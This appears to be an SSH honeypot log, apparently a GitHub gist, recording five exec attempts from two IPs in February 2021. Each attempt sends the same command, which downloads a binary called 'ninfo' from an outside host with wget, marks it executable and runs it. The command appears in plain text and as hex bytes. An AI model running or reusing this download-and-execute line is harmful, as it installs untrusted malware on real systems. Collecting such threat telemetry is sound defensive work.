19:39:22.438 services ▶ DEBU 783e Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000dedc0 {{0 0} [0xc000dbcd80] 0} 0xc000e95c80 {0 0} 0xc000e95ce0 0xc000e95d40 0xc000032ec0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000e95e00) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000e95da0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0011494c8 {0 0 0 <nil> <nil>} 824633929584}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032f80 0xc0065a0060 0xc0065a0060 false}) %!s(*ssh.buffer=&{0xc000032fc0 0xc0065a00a0 0xc0065a00a0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 19:39:22.438929832 +0000 UTC m=+1544150.720325611, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=47254, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0m1uq8k9kn000dnb0pg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
06:41:22.360 services ▶ DEBU 7ced Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000e40000] 0} 0xc0065784e0 {0 0} 0xc006578540 0xc0065785a0 0xc000032300 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d65a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6540) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc006628570 {0 0 0 <nil> <nil>} 824649040112}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c140 0xc0011fe060 0xc0011fe060 false}) %!s(*ssh.buffer=&{0xc000e9c180 0xc0011fe0a0 0xc0011fe0a0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-17 06:41:22.362375011 +0000 UTC m=+1583870.643770813, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=43054, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0mbl48k9kn000dnb5gg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
06:45:17.966 services ▶ DEBU 7d4e Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc006578240 {0 0} 0xc0065782a0 0xc006578360 0xc000032140 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc006578480) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc006578420) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000e90770 {0 0 0 <nil> <nil>} 824633926256}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032300 0xc001151640 0xc001151640 false}) %!s(*ssh.buffer=&{0xc000032580 0xc001151700 0xc001151700 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-17 06:45:17.966566009 +0000 UTC m=+1584106.247961833, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=45688, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0mbmv8k9kn000dnb5sg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
16:00:26.520 services ▶ DEBU a883 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000dee000] 0} 0xc0011d61e0 {0 0} 0xc0011d6240 0xc0011d6360 0xc000032140 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efa720) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efa6c0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004827d0 {0 0 0 <nil> <nil>} 824649040496}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c280 0xc0011fe240 0xc0011fe240 false}) %!s(*ssh.buffer=&{0xc000e9c2c0 0xc0011fe280 0xc0011fe280 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-25 16:00:26.521731488 +0000 UTC m=+2308614.803127297, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=136.244.96.12, source-port=41574, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0rsj68k9kn000dnchng, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
16:03:19.025 services ▶ DEBU a8e8 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de9a0 {{0 0} [0xc0000ba540] 0} 0xc000efac00 {0 0} 0xc000efac60 0xc000efad20 0xc000e9ca40 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efade0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efad80) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482f08 {0 0 0 <nil> <nil>} 824649042672}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9cb00 0xc000e99e00 0xc000e99e00 false}) %!s(*ssh.buffer=&{0xc000e9cb40 0xc000e99e40 0xc000e99e40 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-25 16:03:19.02608191 +0000 UTC m=+2308787.307477687, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=136.244.96.12, source-port=37354, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0rskhgk9kn000dnci40, token=c0a8v4ok9kn000dn77n0, type=ssh-request |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment